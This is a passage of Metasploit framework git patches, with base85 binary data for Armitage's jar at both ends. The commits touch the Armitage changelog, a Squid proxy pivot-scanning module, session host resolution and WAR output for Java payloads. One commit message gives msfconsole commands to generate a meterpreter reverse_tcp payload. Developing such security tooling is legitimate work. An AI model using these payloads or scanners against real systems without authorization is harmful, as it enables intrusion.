zoHk*RPq-irwuv4rb1a;8Bo_zU!|8Qgw_HAh9?Z%v&!9cn7Ni%6?Vt46D7;X?3%5PZ z{uRG*AGDbV=OXE$W`y&;5g;`iM_WT_2?_jxJKz?A#zLFo_B#VP2bc)n`gx|ADEFkHS-kD`{J#^3y)6#iQtdk0n-io43w zVrvCk(XRgg6uozEPIcf+LD98LOD+YVYG1T09woiLM71Yd=I3LbuUBK4Cu5oMHwT1& zrD;{poWb5Pv>B@!>!6~36n|9kv7v;7g;0^ia(92CYLYi~pbQMuW|Ua)I&5XP$Iyni@SnI}_k&PV4-{i*y}qQ*`YgKJHv_fK;Xf1n*Y#JLRykQh zB4l<fgBZ#^l zl*Q6oY%uC$F&Kf7ESuMTx*Yt9rIlETLL6-<`5I2d(fTkbj@Drv8I$_`{wcKTfK5l- z^3NE~a&}ioU~ZlENXPe6bWQ(T)E{v~m1cA4HXHLlkeb)D+9=O^r5sduWxtRJLYJbz z0v6#H&a>JV37NAZPiei;zp7hZ{^(~dmbUeON~^OP91`emY|`KaOe&X42t5chWHcb| zG%W??3A6$AAU`jDhkjn%76aH^#wfvwL|Q5@YpWWzQ|_-c&7go)so5&3vZ7Q}#jp@n zZ1U<$6=C8L&WZ{3r3lGxpfrc3sdZcP)GO^F@(is8bLU{bpGuLifkSg>N2;Te&0y6b zO%WgXheb1}t727r4{Jf}T(lQfBf#=-Y%ZFJ*@svcWaiOMl9t~<_Zt8D)uLJ;P^Z=cl|tz!)~gHB*}atnneE=t5W$ySwyA$si=y}ZC2&#Q<03} zY!a4s>phg%{7VRW^O0?7W%U<+S0xgf`t~<3mePiz`B;c!5@5c7)&g%uNfoerCnyF; zFTiy9vP3qLN>?MFdZ25FI)<8p+Jh}bCryXQG~wC;+J#zfzyZ@_x<56^kpr>G^dM?P zUk==L@5<(JGTwrk10`YVR7oRHS&0=!FGPb8V<9AkwuGk((U&<3>0y-j1R>)=Nlg|4 zZ8#husSL4;ut+_piqNm4Bz55}p#wuiXz#^zA8JFqD6>#fLD-O_pfFWZG|bFg5!I$t zR3*J1;x=QO{+1@DnmLcChEofckWUNvkV+eYY%1+e1uhd|)N&>DK_wlFx+fKj`h2-i z=0#Z*b6`pu?L+Z43MF#zAdL>DLN|*r3Kf!;5N+615s;3?9#@Dc_#Tneg!Xj0Cv~dw zzx1L*l5!Ba1fx@4BQDctJ3QMpp=Al$9D4xLmSM#kEyeoGIzoUQ*q_BJ%vp-*uOH=@ zx#uKRVa3U=wo`asEH+F%r*-W-YIXHmDF|DJ89X^oWaFvxjpS1of*wd}!^RX0kZuNw zkKN{I&kT&@pJyB>%|K_o-oUdAdJLuhmLsc|)7W2@)2`I>_d;d>WiJ6+GSRMdCOw!^ zk>kMBOl*+DRSEE?X6Zsh7M9953&|)w0=mP>EV?)4txrH0bKf)YaArCCY`T36zn>xUzY%wWVSoOpfi z$)awg0@T2HAf=}KZ(O|Ci-HC($^xPWQtEIen?xs@HsHzj6Yyn&DJ_m)KzLIZ0e^fb z$J4x?t^&$vHSNNq1`1H}YPvs9%T0hDuErVekijhK1wJ`=`xrQsMV7ER2Uijv!&xs) zp)&{Ph)N+W(uU2^lp^@%qWX+b0re-BR)meYI9t>S`$zTXy^LUyCitwukR{HbAbUP# z3T12157k%}F`%{<+m^#Ta9vA}qQ1|A$7^Y0*s&Hn?|~!&0x6geO&e$(@XW(Or#6`b z#RS|~%z-unj;3?KZ5@L7%Q&Evi$U3)hd~@wNQrj$M>(8AY$0V0%IndG;58iMvz{JJ z{a7m$tHO>v%-x_|Ed8!cLIr71%SU$?Z{ryJZPWqO;T;_C+C$;ZpaAo~myb={ri!B# z09)ws8V*bcY{-lEa^MgFnFlzaRDh=J>Ns%ZG^GSF1?cH}0aIOoC4GN{6Q`V|)JRDM zLzejl%x+3OCmXW?6&Ii6!1fKaGu3{EfB>rdMe?Z&qYJT{{kp_yloVpNqZ&Ez(hj`sv4eTlCXCDno`~$nCLB6{NsBN+n~}+v7c%bDTLS_n zQ3p-PCk?@To-Cx4U~RNp5QYyk%CVKaEkWa1&V(@q>n%9S3>id#2{eu3DFbZ6Snu3| zI>X$Bv<`U0byb_(R+Q}-B9y6s?^c|MTpi9aC0pr%)LBoVSP2xip?G(skdcNd+c4K> zi5yc;z?->3pbT^=CfJn1F$+pje03QIV%GAM;Lb+8y|Z!pU5c*UST2-lg2#3&?v5-W zqX?U}qp`qzj%hF9X~C>=Z0j03Fe$Hyqc?5m>B6Q>U6q(XWXc{X=mz}pEx52L3>fLb|iMkShNwV`_^7;1z{7#6=Y%QNm>J}_R%I(&uC6IejnD=Qx+J)u6;Nh&Ws@v7RZCr zeykboIF6}YAf*mb`?2m5=McsY>i6TY9g6cp0_4(B+<5?VA9et9e>tDf)2PN|PTYC` zM`OFi9JrF%r8~P8b>mYxy0#V_xRB0)S=mxXoV^hTX#>eCF!cbAH!BZfmMu7`Bw1#! zmD1!?v<{(}k69c&{t!Kaa$W^n4q^URRuj?|x*f)%3|~)x87w}GRuVT6U~jRor0galEl@isg>z1_R@+JF9o0fw9o`&4TP;V0j3T%kC5~MZGP0m_2SfGY2&UhE z6w^bwj8no&Q)$iCcSw9>Y6H$W1Bmdnsj}|3pd_`tQWF zKc7m8PQ_N<<`kgg7|z;8-xZ)y^@ud?3s4C`Hy^O5HyDoTnx^X=$1FM@vb-4t9>+P9 zMKg=EA-7FR4vxLY|0<8;4YBk2KVAho2{o-lKn*&914gJkG@QU~y_^#mrSmET_)>A| z9GTld%Yd?xv@TRXA#o>*@QDp1KpH{?Cu*7w0ow4m0f!q`ocR)P)k0ba2A#x;b;p@5 zVNy?Gb`HiIxO9@}nhA7iX;qMq?CQc!r!a>nR-7!(0cH9tx{97bWD$H$rrJ+h2LATK z|NgBRZW4t>-GvG&+-QE^Ra$gdi0a8H{C1UAhu{jb7(0y}*4>Gt>)fT4;Hevy8z;$v za^E|RhVA+a6*R!`43;jzg=2!w;Its!l>-%Luykp&;n^A5gYrorpIYE{7Ds_ki5zHJ zBrOHGXR)`|Bng7k6^t#9?VUcutsayM&Au z6xT{Cz?;LwVY0HEb{-ves1_=i!y6e=P$D};WLo=#GA)q3K=-1aAK)0@3-k~w`Ls|h z2RYZJr9r<@TA5o|gk2X4XUAD_RSht{h|Z@x=4iDRX-h~Y%;hHn#fvz9D|syq*RRNE zf$1fjU~O*`px8^eG4InZKqoHK3UKQZc7%qnBGmfHGP2P9GB)QsKSgLrx{R7~fB#Ya zsZl)eyNW?&Eg4T*mJ^^24*O-aA?^k`cW{@GQGw$((8HINLPi-p+Au0?hV)I$@Kr4*n{*S$(q%{C z*)5!v9=eIC4jt!!!Yu@2PI2JF6^wy=c~@sjxP>OvvDJ`NRYWo95&_ew$jju@1VV3P z8MLp$nme>k{vBKd&bWd52Ul-nI-6@z13 z@6xIec>|}(CU;T%_JxpklcXT`4hm331;$s94M);VE)zYKHm;;4-(~cr<)EG+IG?pdz<1ljj!Yj*o}?v~FHZ*i+L5;xlQx)$O1S(=vh1#aBK(>$`l z{R@-v$~$C0|301;5yt&KG7aBlUdnHq#V!cOt#A+5od>}7wZ*| z&`hQ-lsyuJx{(mG^x-`cY(ZV)q^L_6unx4PD;DYDM$qH2AlZb+m~6NS%^+&K>yf55b%%#f@Bojr1j(mJGz;%HjT*$G1GGyhzV7H*9T&rx}RE3e+hn|Zco$*sR{aeokhd}R$ z6}2>uHGV;BvK7}T_3};$sK3ODYfa~5DcQ2JF!O~VoXIaR*_oxBsIn{By1mz8t03(K zCM(b2WMdlz?kc{-6gin3I{W&sd-K*H%TB!pG-m z+zr;_@v}5-=Ao_x0kLyJ zXFvnRa7S|WDFuZ}=<5tTlG74PGW-afc}=@fOY1?lg*LG!8Mv3dF0Pfs^JF}k!!t8xkic)76aJN^%{UJyT4*aaQV03WgkqH4 z#(&}mf-29!_YE$wjNb^VIc|7UXff8$T`ZrK&>Sh-D^`^|OAZMh^Wp|dJyFw9OzZSZ z&fw^evikqdIuqvp9hRpkA<=~45ks{B(e^Kc!9{SZ|zZ4H;bq5<9htUZU{&AuCwv3KBNw8#v>hwZ%@)Z6P z@5_gHauBT{rw_C6*ow_<(K~D{nRt-%j&|T4SRe#0s@}X4ba6HOntMu19lF2AfrprH z46l7P5Sw5ozE>pPg}7ddP2 z`hcs&Row;X$51(CZee-tGtPG!KHz-Ex)(hDKzmcadqekjJlOa!7}DBtQTTWW`7{E2 z=K_y?@GKtKG_oHt&BdWarVUM@a#G;>5vOiTy@ZS!ypP3&2dmvNLr!!?eaug&B?ZQj zayroV5vQW-{YB_rpK#rnG)9C;|Aaes;{!P6(kI+GlOM~0xX-v?jgFC10Ef?Lr}H1( zk7^$W6`ye$+%FQ^Khwi0=_vB41KwY7`Z+BY(!Sv4{GK@SsRc@zaw<^0s>|(LE5zI` zO5n75e#Ir-f;k*m{1s0)^^-X8=qtL|Z5aowI3 zxI^%)16TFi*0a1Ns8pf@4&Sg({K#i1M_5JB>;i$p<7zo|XeHE<4FX$+doYdLcci`* z3aD{=kxFXrs;q6_F^^uw0^z;y`1o7=Mme~8P|g;b_M<^%qpl)P`hlt$C9Kd{gnw5j z7K**w;PDUKqzT&(J$_*e81)m60Nf98U}Gbe_d_Sa-Asqag&odcjAhE;~ftCXzfxg>BNnKpAR^C>?b(` zVw>j8e<}wJ9T>(3^>ri(d)gL!Mt@p1)!X9R$4CFiW0MgB3hXS!T}ZAuSCG z&hjd74V9@_YmVMLKwcFJ{$Q_NFhE{(AaS=5D(JxX^sZKA?JlPEo-fo=g_}|gF2cKW zjIlK1Mm_DxfdQWK+MG{C(&*D}CqXJ%^mo=|d1Y|$mY0Da(&*UtVd64fh?YS*+((3d z6fSScnfoDw=De}wB<7omIg}}Yw=4!#cZ`r8Nv#QDLB1U0N-YiL1c7plJN0k|2dasr zbS4L+hCLx`pODedzl3#NqK0LjbBtr3t6|T%bdm!D)tLd*y0aWur;h$> zUgUsp3$~QS&#=KhA;*lG8jJ~b?2=HX3iNY%>f5h|!4~gbMHV(4+GMIod=YtGk~Y z2iA|nTyR@n4GQ&9XVFlOzO0Xps>PcFMg~kDDtQbCA`KWPN@fB9{*>b+j?A8|AP;wS z(TWw0+|;39jvi}>4YAi$4&=^LP=jNJ7=r=Rgp3@>8euKXPv96IBXrGi4hOPVDd0`l z2oq4a;3OrUlBb}@l{k7m8l#P|we?)g$#T{!C_a1AD+y1wIUNtk3ZazX2L{K^~=ep4Ge9-twXkU`KBlygNs3u zzGfR%Y@{jrn1pLS!t63d^P_Q*M!;WFj9h#%2d?f@Fykt8p&6P;Eam8?vlzPvN3gxg z(dhjhB0EqnA~S5jI2fB_9!si)v<9~m&U%z)j!6pk3uSW9c?pxSrxC2eU83M!C!(Nk z!Sulm!;fZ+DMZ}G;y=*Ayq8#@-i$LMddDpA#;0>hgh_5D-dLhHC$EXn5tdle>$gRi zqn6lEnjeZV8dhkm=8*^!ZpHMaa-ML^`>zTnpg?NyxfS~H;44S>RaP_sLp!90SR)_fQ1& zF^YQNW6KQTUFgpuYtnvbDsC{8*fEB1V}haq$(W{WM{!KnG(`P<1?&S#?brKpKQ24GWI@(-s;uKP4m1LmrcSTLEE+)t-iE5d(3$<_p zZjYX<{KhfwRFt&2B=hXC;Ag*c^lp2mFK_1$MR4z_qzOOl8BgAap918mp(N<$R$5A; zbI^Cc1scP(l=SnbVm&-?z!87<9|5i4h%?1ke+5X*R!J5j9r1Q{Ko#P9GI+#lt7OCt zc5fWfmn%Ai=7W6?W+e5)fB~c|K=}mtg>#_A30ug`nFRPzA7+zJ z6Ijz1HI(La8gaQw3eegYoh?e`n7^Q;2+pMUPue6_Xp7~X!is)aQM$U{kRb2=(of$9Q;>}9Xa8QX4A8Ik=@0=N2OO&vb3s?2iT(FuFx3ZKSl(}FJ z98wo+o)sND;0FDC~Ye;QUk_S6ibmz%s z!q~&t)mX=D*DG|zm_NP3(Jx%Foi|-4Aefi=O$pWvU_yC|CM$#ABIRyiIglC3`-P9Q zvnY1HvO2fcXAK=3h%TKC<%Icz&>8t~7W5=HR+^_$CrB6NgQ0#s2(?wtE0bVY!iQF6 z1z7S_87JJrd&>kj)Ogw`suA#7*-S*^Cec`W=bwg+h_K?5vS@#ZfA~)gf6dw#W9Ttd zMN~r#M@Do8XVF7dbU=Ixx8Y)0WQ&d!-U@+5@M-LOF@`KRC zNb=M#YeIJjny4S~PeTiWhhRutg9TLK92HGCpO0Cd7=puD&|GL5!UR*R=YiW$CWLB8 zBG?ScwGy81i!#{^M1lDNjWKvWH=A(J7+*<6(>o z?^~uQHDEa7#(SSFN{!pDq6;%U(e%aPXgYMQKzO`d#e|zL@kbzE2BL`~M=;Jj|6KyA z>ZA%jA20$PD6SSzsw0_EyoG!JA$)A(f{H33|xd@ev8Kf8jlvQx}Q|5pNyW1U^@$)Q8Miq9(0!yE69ZeC0up5!+H zLT7vP62A-3T~$?Gu1HFwG0o{;0)FUd)au(QK!sYWYTSIT7PY7)QsC(v@;9QE*E z9l>O3sx0|5hTYys&XMOd6nq$GDnpY4Z)nVmtX^60jl`CwlCJ(5?VDc2X6=We3?N!4F?W5`C(&O)QbZj{1`z*B*nj*`?l`MpKw7K2$jdGn?+G3LlNstl{Js>{jYo z0<^e9RgUYFjse(1Bu5$ctT{F z;R2MpNKFph#-c*oJD_Y$dDIRpBSmOaqjBmBRznw_BF~O_yGX))FT3bq?5F2i1juCyW_Io^i!>o?3T}MmeNYGUP(0*+ zIt2$C!_O?zhlL6nrf5zng*_u^4azja!;CxlPyA59?5n!O?68E`IkQ8<5*$LN#m-5z zpOF|dQ}h&xSh(sr*?$op17zVp@ne8l9by&)@1Av!42_*-9}yW2?dSx%@BeoyW5~1m zqYlO)j2*l2f4<7=hYN1}kH_OF@uN?NnGhDjaBm}LhcI{yJPRs9814<^%Y@jU0dGPW z?xkMkX-L>F19}?6y+!Lsh}dSBHH|T6b6Q-wOLd)tjKrHhGXFV9Dtivqn2goh;;7(d z)t!`MJ7OtG5qc^YHEYF)MS>|?!4LL#tMLIPh26#kW_opFOcp#q;Kgkot8-y6fc zE~W?>>T@9+3T3$WpPvvyqZod55$4m8SXl-Gr!$spR`#CZ`e}Hulz^wx;zw~FxCh^* zRh#_r;RZ@lqCipdKW=yC!s+P@_pbLFG|oGpXAbJS%nk61={y)e(yU| z@%(PyFz$EIyFyl)cK?$V=!G+;tTDG~-^0h@dmYlY|5b~WhjHPI8LPFg`C96FJUzUK z0TDkFY{zGr!v!s%J{-$)*c2XybH&e(Kx}IX#u1DWYvz94)*ff^g!3+jSNst2L=Tt{ z!I;RCX74gw$KD)LBN%OJzY{2iL~4ID@soX;YrstEGZs<3ja#e_WFU^42F9P*>MK?YcdW-&tOd07%qEp z@0=_;`nubHi@iO>8hRvK>xw-+LcH8iGw90@^l&zISPfx5kdVyp#wvL@=K`)vyVe?eadKdf%qo82_-}1@dgo0>6+=ah*h;3Os zPwi&77cGeBe}8DLs~StwuD=A`nT#>pII3Qy1U$pqX~J-bm(u^YH3ZJYX;L^3dd$Kt z>gt)e<~NbzKsRF>El`QUJEgoF$LN~dsB_Z~-&kCOjkC59y$-VWWzCzadfVJ~5)_RKxu!48< zFj8ky2?(S1PFzSoMC zN^KLT6}J#QlPMv<7#xmZNX-u0D8jw97%r(JVo8j)3bpXbh(+kboKhhp4cW&q%vprK zwL^q{e;hjru8q~8V-dE*qH=+3F-~-!?k2zpG8SV^TOI`SRNQpEyBNFX8v*!p4ZG%m z6g2w%Feg^NiP>COk27wzSUXbC=-hfvw(>4&we~Cr z-Vu;;0nF2|(o!4Ar#Wm$V|qy@LPH9!zFX69Yy9*>PJ4JdYL`9Xz|n752}wS<+-F@l zn2ve}A#wQ>rhm*QyU z^nm~qs9cKi8L0?Qm*NO=RtFrHVPB5aC!e}dv<#1lE*RS45AoXCf=@QuRL;P;bFL9f znSo~pZqBSX5un|DZ8hOY2CiQ=n*F2XKy5j$S#>OJL2aO|IoP|}s>6cisHJbsQVv{P zAGq0yPTN0Wj;y{_Ca#g*@bNi=!M4`0I1?+()DbE&aSQB34_lB7wl##2*`!lvp=*nJ z3aFe>7=~F{m<`oiK-FfUAMSkxNPY!wTP$%AppX@~;kI~?0OgLiRe%#KFtPSv0VTH* zW1%pNMK%z*5@nquSY!Y-D{;LV=4}f>5w<2=178{`7W-mf=)MZa>L5Q@vu_W)+WnctG0St&(~4vc+{wkpxnwB^R&B&q!5J$NH@2K8 zn8LRbTlO72L7U&c2HU*NN+R>&d9SgBVHLJC3|NbqwQYsSwOH?mw%J1UQCls`LeHvgQhKA7ZT(U;fa9qp#A0TeXa>Op-W79=|lm0aprz86Qe5^BydfojGbTRgKM zs-xB+f4YI?_2Ez<#t8_eebE+_p4(c$g9E7bicndNwvgI_5obpRr}an`G}}VXFVxa^ z=<3B6d3K^LyZNmxY+a9=<|?hWcqVIS0H!i_GGyq**Q)c;gl9X;o5Sn5NQDtf=L<_| zL4H2&?8^C zfJMFmI4t3V#4K<$v(o^_0u*nO7c$aNZDA)E&({`UrCBLLT0Y)T9jxq>ppj^QQRW!6 z4LEcSQs=I`v$yW=jn4`Q%?+rVj(6Rh~GFw#K_>;Qf~|o+wda`F`J8) zoa}EQ26#sy?iwWVg^Vku;3xz#VCZ3I#?@+O5hnHNBO;sXZ6^=si!isZ{a8BR-%eQ& zrT{z9k@G`;PQH=B&GBNqtL=0BN7NMK?M7{27txQpfX}@V-+eaXEprKOToJH(GR9=* zM$F7=B*!>}Ad|HjYgl>{y5{5w=9_Tyti%h{H)Dd-P55laNpB8ZiNFecOmx2zT`PY= zkEYxMII&lZofa`gQwzs)%*D;j0O+@oQ3tclj0~8R;1TcrU`{r>g!IlS99W%XrwZ3f zFsbx3j!{eQ%B%Ml%xgv%M~7`8yMGZ7vK8kjrdt_#xU>bwuFo@sj2pFeCIM5a&G=3t zQ9GDrr_DX$!!}QaZD_A5k&}(wh86b%-%i|$H%GNKSi_g7t`2jGD6UK4GTvN(90Cz2JMou+Me>JYgdORAg= z>$fvwco(wm;KUAWAlX4(IUDZ4&UPo)4z85jnSk?7jCeSq64%;6^e#I-chbm~<|yH{ z^6fye+RhT1h^kT<=GU4Jc4asjvntR{xr=u2w;A26sz4vU+ye7m*u*|mUZz6PiNudFU#=pm*qA1_{$Zee?mp@D#KQFzXqMS zhiwe)7{mLa7!PI-W~5>-pyuqs!JT$wktIAPvS$MYW=!{D0F2!KAsI;Bi^Z7lBcRUj z#eVi{4Dj~h0h)FM`0T^Vxg8C~2kZ z_*a^ywH8tjGTqrFweV+PaDP%V6#lrgi;vn1|4P#| zss$!W4>O#JI$}a+pMV~H8OwCxgdhkG_S@=iVG!Ce2;z1w9N-e(JKi zgRDpslIs`^*2`Q%&pL;lq6r%i9WQut{XU@wTwrN!P&y)r)%uD3{CeOv(sbN>6n}%~ z@kLfw3j&S^EJq$;3>Amn;!DhlbZ`#{nFiM{(K-y-Bx>n*A!QPVU=D7fh;PNLy(d(k z83yD#^K3|h`^uB9$6z^E;LehG0wdh|BKBd^VMd=d?ls47^kX!hit!cKJ@iD>IQbSm z*7&?!izE9m!H@q*aJpGw+`dlmf<&xm&`u|Gq#pIfjqi8`4M!PMwu<+EPgkFcWsClw zEl0&Se2_fG7_p%@JBBeX_`rvO#~2GXVZV5v?9EuGIhcj`zEapnoYZuwUFvD4yAjoL z|3|IwXFi-pHP-$cVqf+vA7twVOt*Suo^|lSvx|u(%+?<`s@5}RY^oZFJRaS(1 z)$hqg!yi5<92ac1+aJfBxg!!V>bSsg93hf;kbS(%3L$WW2|0mFu@}b$?fEBR9r248 z2y2fWkR2e7rfHR4#o`!YP{m*8=!f6XZ~_MvYy+_R1g3RU;?k1N%ck9!|MlZq48t#M z8RBV!R5(?o27zi!{vmf*YXZ4+J9j8a5zBz6?iaVHOO!T?Jd7Z=% z8=KSM=0e-Chgxizw;)ZaTR{Cu!CA=mdk@@C;gDgE;p!tCI>=bH)GGfJGlb2uK5WL; zQ@G DNS Enumerate now populates NS field with highlighted host. +- Armitage now adds a tooltip to tabs associated with a session. Hover your + mouse over a tab X button to see which host the tab is associated with. +- Fixed a potential exception caused when listing downloads. +- Created a queue to process certain commands meant for Metasploit in order and + in a throttled manner. Started moving some Armitage calls to it. Now you can + fire an exploit at 1,000 hosts and Armitage won't blink. It might take awhile + before that exploit finishes firing against all of the hosts though :) +- The file browser now has a "List Drives" button. It's only available on + Windows sessions. Click it to see which drives are available. +- File browser can now navigate to folders with apostrophes in their name. +- Made some major internal changes to how Armitage interacts with Metasploit. The + goal is to make a more robust and faster hacking experience for you. + 22 Mar 12 --------- - Updated Armitage NMap profiles with the following: From 0fcab521d22dc395bb2b6d259dc56a90ea3c5cb4 Mon Sep 17 00:00:00 2001 From: Willis Vandevanter Date: Wed, 28 Mar 2012 02:32:03 -0400 Subject: [PATCH 41/46] fixed print_bad --- modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index e1de4e497c..60effdf61a 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary end if res.body =~ /No route to host/ dead = true - print_bad("[#{rhost}] #{target} is DEAD") + print_error("[#{rhost}] #{target} is DEAD") end print_status("[#{rhost}] #{target}:#{port} blocked by ACL") if res.body =~ /Access control/ From e522b4046518d6100e8ee6756e4c2b6e7e52f7c9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 28 Mar 2012 13:33:10 -0600 Subject: [PATCH 42/46] Make sure session.target_host gets resolved Not sure why this isn't already resolved when we read it out of the datastore. May have something to do with the recent options madness. [Fixes #6567] --- lib/msf/core/session.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/session.rb b/lib/msf/core/session.rb index 71a90130a2..4f3fd9d060 100644 --- a/lib/msf/core/session.rb +++ b/lib/msf/core/session.rb @@ -260,7 +260,7 @@ module Session def set_from_exploit(m) self.via = { 'Exploit' => m.fullname } self.via['Payload'] = ('payload/' + m.datastore['PAYLOAD'].to_s) if m.datastore['PAYLOAD'] - self.target_host = m.target_host if (m.target_host.to_s.strip.length > 0) + self.target_host = Rex::Socket.getaddress(m.target_host) if (m.target_host.to_s.strip.length > 0) self.target_port = m.target_port if (m.target_port.to_i != 0) self.workspace = m.workspace self.username = m.owner From 016ba1613dc8d8ad0e829ce1572195062f1f556a Mon Sep 17 00:00:00 2001 From: Michael Schierl Date: Tue, 27 Mar 2012 22:43:50 +0200 Subject: [PATCH 43/46] fix generating war files for Java payloads from within msfconsole This fixes this use case: use payload/java/meterpreter/reverse_tcp generate -t war -f filename.war --- lib/msf/base/simple/payload.rb | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 05fdc18934..b9f4f1e785 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -74,6 +74,10 @@ module Payload len = e.encoded.length + if arch.index(ARCH_JAVA) and fmt == 'war' + return e.encoded_war.pack + end + output = Msf::Util::EXE.to_executable_fmt(framework, arch, plat, e.encoded, fmt, exeopts) if not output From f5e05461f69e114e9643a117a649ae81b425d58e Mon Sep 17 00:00:00 2001 From: Willis Vandevanter Date: Wed, 28 Mar 2012 22:18:56 -0400 Subject: [PATCH 44/46] changed the false positive check IP to a user set variable --- modules/auxiliary/scanner/http/squid_pivot_scanning.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb index 60effdf61a..03fd0493d8 100644 --- a/modules/auxiliary/scanner/http/squid_pivot_scanning.rb +++ b/modules/auxiliary/scanner/http/squid_pivot_scanning.rb @@ -48,7 +48,8 @@ class Metasploit3 < Msf::Auxiliary [ OptString.new('RANGE', [true, "IPs to scan through Squid proxy", '']), OptString.new('PORTS', [true, "Ports to scan; must be TCP", "21,80,139,443,445,1433,1521,1723,3389,8080,9100"]), - OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]) + OptBool.new('MANUAL_CHECK',[true,"Stop the scan if server seems to answer positively to every request",true]), + OptString.new('CANARY_IP',[true,"The IP to check if the proxy always answers positively; the IP should not respond.","1.2.3.4"]) ], self.class) end @@ -65,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary manual = false #request a non-existent page first to make sure the server doesn't respond with a 200 to everything. res_test = send_request_cgi({ - 'uri' => "http://127.0.11.1:80", + 'uri' => "http://{datastore['CANARY_IP']}:80", 'method' => 'GET', 'data' => '', 'version' => '1.0', From 28483711e7c76f18a1808f0576eaf59203d36ae7 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Thu, 29 Mar 2012 01:00:03 -0400 Subject: [PATCH 45/46] initialize a console before connecting to db (forces msf to setup the database for user) --- data/armitage/armitage.jar | Bin 2868473 -> 2868524 bytes data/armitage/whatsnew.txt | 5 +++++ 2 files changed, 5 insertions(+) diff --git a/data/armitage/armitage.jar b/data/armitage/armitage.jar index 02e92a3125c73293742abad4176a30ecd5fb8bf5..52adf6076e974e29ae04d3eb89df544279ac60fd 100755 GIT binary patch delta 18143 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 